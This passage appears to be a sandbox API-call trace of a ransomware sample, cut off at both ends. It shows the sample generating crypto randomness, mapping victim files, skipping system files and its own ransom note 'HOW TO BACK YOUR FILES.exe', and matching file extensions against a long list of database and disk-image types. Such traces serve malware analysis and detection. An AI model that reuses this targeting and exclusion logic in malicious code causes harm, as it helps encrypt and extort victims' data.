users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.647] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=152416) returned 1 [0088.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.647] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.648] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25660, lpName=0x0) returned 0x15c [0088.650] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25660) returned 0x420000 [0088.658] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.658] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.658] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.658] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.659] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.660] CloseHandle (hObject=0x15c) returned 1 [0088.660] CloseHandle (hObject=0x118) returned 1 [0088.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.661] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a375400, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a375400, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x137960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="..") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="windows") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="temp") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="boot") returned 1 [0088.661] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="perflogs") returned 1 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.662] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0088.662] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0088.662] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLINTL32.REST.trx_dll" | out: lpString1="XLINTL32.REST.trx_dll") returned="XLINTL32.REST.trx_dll" [0088.662] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0088.662] lstrlenW (lpString="Ares865") returned 7 [0088.662] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.662] lstrlenW (lpString=".dll") returned 4 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".dll") returned 1 [0088.662] lstrlenW (lpString=".lnk") returned 4 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".lnk") returned 1 [0088.662] lstrlenW (lpString=".ini") returned 4 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".ini") returned 1 [0088.662] lstrlenW (lpString=".sys") returned 4 [0088.662] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".sys") returned 1 [0088.662] lstrlenW (lpString="XLINTL32.REST.trx_dll") returned 21 [0088.662] lstrlenW (lpString="bak") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.662] lstrlenW (lpString="ba_") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.662] lstrlenW (lpString="dbb") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.662] lstrlenW (lpString="vmdk") returned 4 [0088.662] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.662] lstrlenW (lpString="rar") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.662] lstrlenW (lpString="zip") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.662] lstrlenW (lpString="tgz") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.662] lstrlenW (lpString="vbox") returned 4 [0088.662] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.662] lstrlenW (lpString="vdi") returned 3 [0088.662] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.662] lstrlenW (lpString="vhd") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.663] lstrlenW (lpString="vhdx") returned 4 [0088.663] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.663] lstrlenW (lpString="avhd") returned 4 [0088.663] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.663] lstrlenW (lpString="db") returned 2 [0088.663] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.663] lstrlenW (lpString="db2") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.663] lstrlenW (lpString="db3") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.663] lstrlenW (lpString="dbf") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.663] lstrlenW (lpString="mdf") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.663] lstrlenW (lpString="mdb") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.663] lstrlenW (lpString="sql") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.663] lstrlenW (lpString="sqlite") returned 6 [0088.663] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.663] lstrlenW (lpString="sqlite3") returned 7 [0088.663] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.663] lstrlenW (lpString="sqlitedb") returned 8 [0088.663] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.663] lstrlenW (lpString="xml") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.663] lstrlenW (lpString="$er") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.663] lstrlenW (lpString="4dd") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.663] lstrlenW (lpString="4dl") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.663] lstrlenW (lpString="^^^") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.663] lstrlenW (lpString="abs") returned 3 [0088.663] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.663] lstrlenW (lpString="abx") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.664] lstrlenW (lpString="accdb") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.664] lstrlenW (lpString="accdc") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.664] lstrlenW (lpString="accde") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.664] lstrlenW (lpString="accdr") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.664] lstrlenW (lpString="accdt") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.664] lstrlenW (lpString="accdw") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.664] lstrlenW (lpString="accft") returned 5 [0088.664] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.664] lstrlenW (lpString="adb") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.664] lstrlenW (lpString="adb") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.664] lstrlenW (lpString="ade") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.664] lstrlenW (lpString="adf") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.664] lstrlenW (lpString="adn") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.664] lstrlenW (lpString="adp") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.664] lstrlenW (lpString="alf") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.664] lstrlenW (lpString="ask") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.664] lstrlenW (lpString="btr") returned 3 [0088.664] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.664] lstrlenW (lpString="cat") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.665] lstrlenW (lpString="cdb") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.665] lstrlenW (lpString="ckp") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.665] lstrlenW (lpString="cma") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.665] lstrlenW (lpString="cpd") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.665] lstrlenW (lpString="dacpac") returned 6 [0088.665] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.665] lstrlenW (lpString="dad") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.665] lstrlenW (lpString="dadiagrams") returned 10 [0088.665] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.665] lstrlenW (lpString="daschema") returned 8 [0088.665] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.665] lstrlenW (lpString="db-journal") returned 10 [0088.665] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.665] lstrlenW (lpString="db-shm") returned 6 [0088.665] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.665] lstrlenW (lpString="db-wal") returned 6 [0088.665] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.665] lstrlenW (lpString="dbc") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.665] lstrlenW (lpString="dbs") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.665] lstrlenW (lpString="dbt") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.665] lstrlenW (lpString="dbv") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.665] lstrlenW (lpString="dbx") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.665] lstrlenW (lpString="dcb") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.665] lstrlenW (lpString="dct") returned 3 [0088.665] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.666] lstrlenW (lpString="dcx") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.666] lstrlenW (lpString="ddl") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.666] lstrlenW (lpString="dlis") returned 4 [0088.666] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.666] lstrlenW (lpString="dp1") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.666] lstrlenW (lpString="dqy") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.666] lstrlenW (lpString="dsk") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.666] lstrlenW (lpString="dsn") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.666] lstrlenW (lpString="dtsx") returned 4 [0088.666] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.666] lstrlenW (lpString="dxl") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.666] lstrlenW (lpString="eco") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.666] lstrlenW (lpString="ecx") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.666] lstrlenW (lpString="edb") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.666] lstrlenW (lpString="epim") returned 4 [0088.666] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.666] lstrlenW (lpString="fcd") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.666] lstrlenW (lpString="fdb") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.666] lstrlenW (lpString="fic") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.666] lstrlenW (lpString="flexolibrary") returned 12 [0088.666] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.666] lstrlenW (lpString="fm5") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.666] lstrlenW (lpString="fmp") returned 3 [0088.666] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.667] lstrlenW (lpString="fmp12") returned 5 [0088.667] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.667] lstrlenW (lpString="fmpsl") returned 5 [0088.667] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.667] lstrlenW (lpString="fol") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.667] lstrlenW (lpString="fp3") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.667] lstrlenW (lpString="fp4") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.667] lstrlenW (lpString="fp5") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.667] lstrlenW (lpString="fp7") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.667] lstrlenW (lpString="fpt") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.667] lstrlenW (lpString="frm") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.667] lstrlenW (lpString="gdb") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.667] lstrlenW (lpString="gdb") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.667] lstrlenW (lpString="grdb") returned 4 [0088.667] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.667] lstrlenW (lpString="gwi") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.667] lstrlenW (lpString="hdb") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.667] lstrlenW (lpString="his") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.667] lstrlenW (lpString="ib") returned 2 [0088.667] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.667] lstrlenW (lpString="idb") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.667] lstrlenW (lpString="ihx") returned 3 [0088.667] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.667] lstrlenW (lpString="itdb") returned 4 [0088.667] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.668] lstrlenW (lpString="itw") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.668] lstrlenW (lpString="jet") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.668] lstrlenW (lpString="jtx") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.668] lstrlenW (lpString="kdb") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.668] lstrlenW (lpString="kexi") returned 4 [0088.668] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.668] lstrlenW (lpString="kexic") returned 5 [0088.668] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.668] lstrlenW (lpString="kexis") returned 5 [0088.668] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.668] lstrlenW (lpString="lgc") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.668] lstrlenW (lpString="lwx") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.668] lstrlenW (lpString="maf") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.668] lstrlenW (lpString="maq") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.668] lstrlenW (lpString="mar") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.668] lstrlenW (lpString="marshal") returned 7 [0088.668] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.668] lstrlenW (lpString="mas") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.668] lstrlenW (lpString="mav") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.668] lstrlenW (lpString="maw") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.668] lstrlenW (lpString="mdbhtml") returned 7 [0088.668] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.668] lstrlenW (lpString="mdn") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.668] lstrlenW (lpString="mdt") returned 3 [0088.668] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.669] lstrlenW (lpString="mfd") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.669] lstrlenW (lpString="mpd") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.669] lstrlenW (lpString="mrg") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.669] lstrlenW (lpString="mud") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.669] lstrlenW (lpString="mwb") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.669] lstrlenW (lpString="myd") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.669] lstrlenW (lpString="ndf") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.669] lstrlenW (lpString="nnt") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.669] lstrlenW (lpString="nrmlib") returned 6 [0088.669] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.669] lstrlenW (lpString="ns2") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.669] lstrlenW (lpString="ns3") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.669] lstrlenW (lpString="ns4") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.669] lstrlenW (lpString="nsf") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.669] lstrlenW (lpString="nv") returned 2 [0088.669] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.669] lstrlenW (lpString="nv2") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.669] lstrlenW (lpString="nwdb") returned 4 [0088.669] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.669] lstrlenW (lpString="nyf") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.669] lstrlenW (lpString="odb") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.669] lstrlenW (lpString="odb") returned 3 [0088.669] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.670] lstrlenW (lpString="oqy") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.670] lstrlenW (lpString="ora") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.670] lstrlenW (lpString="orx") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.670] lstrlenW (lpString="owc") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.670] lstrlenW (lpString="p96") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.670] lstrlenW (lpString="p97") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.670] lstrlenW (lpString="pan") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.670] lstrlenW (lpString="pdb") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.670] lstrlenW (lpString="pdm") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.670] lstrlenW (lpString="pnz") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.670] lstrlenW (lpString="qry") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.670] lstrlenW (lpString="qvd") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.670] lstrlenW (lpString="rbf") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.670] lstrlenW (lpString="rctd") returned 4 [0088.670] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.670] lstrlenW (lpString="rod") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.670] lstrlenW (lpString="rodx") returned 4 [0088.670] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.670] lstrlenW (lpString="rpd") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.670] lstrlenW (lpString="rsd") returned 3 [0088.670] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.670] lstrlenW (lpString="sas7bdat") returned 8 [0088.670] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.671] lstrlenW (lpString="sbf") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.671] lstrlenW (lpString="scx") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.671] lstrlenW (lpString="sdb") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.671] lstrlenW (lpString="sdc") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.671] lstrlenW (lpString="sdf") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.671] lstrlenW (lpString="sis") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.671] lstrlenW (lpString="spq") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.671] lstrlenW (lpString="te") returned 2 [0088.671] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.671] lstrlenW (lpString="teacher") returned 7 [0088.671] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.671] lstrlenW (lpString="tmd") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.671] lstrlenW (lpString="tps") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.671] lstrlenW (lpString="trc") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.671] lstrlenW (lpString="trc") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.671] lstrlenW (lpString="trm") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.671] lstrlenW (lpString="udb") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.671] lstrlenW (lpString="udl") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.671] lstrlenW (lpString="usr") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.671] lstrlenW (lpString="v12") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.671] lstrlenW (lpString="vis") returned 3 [0088.671] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.672] lstrlenW (lpString="vpd") returned 3 [0088.672] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.672] lstrlenW (lpString="vvv") returned 3 [0088.672] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.672] lstrlenW (lpString="wdb") returned 3 [0088.672] lstrcmpiW 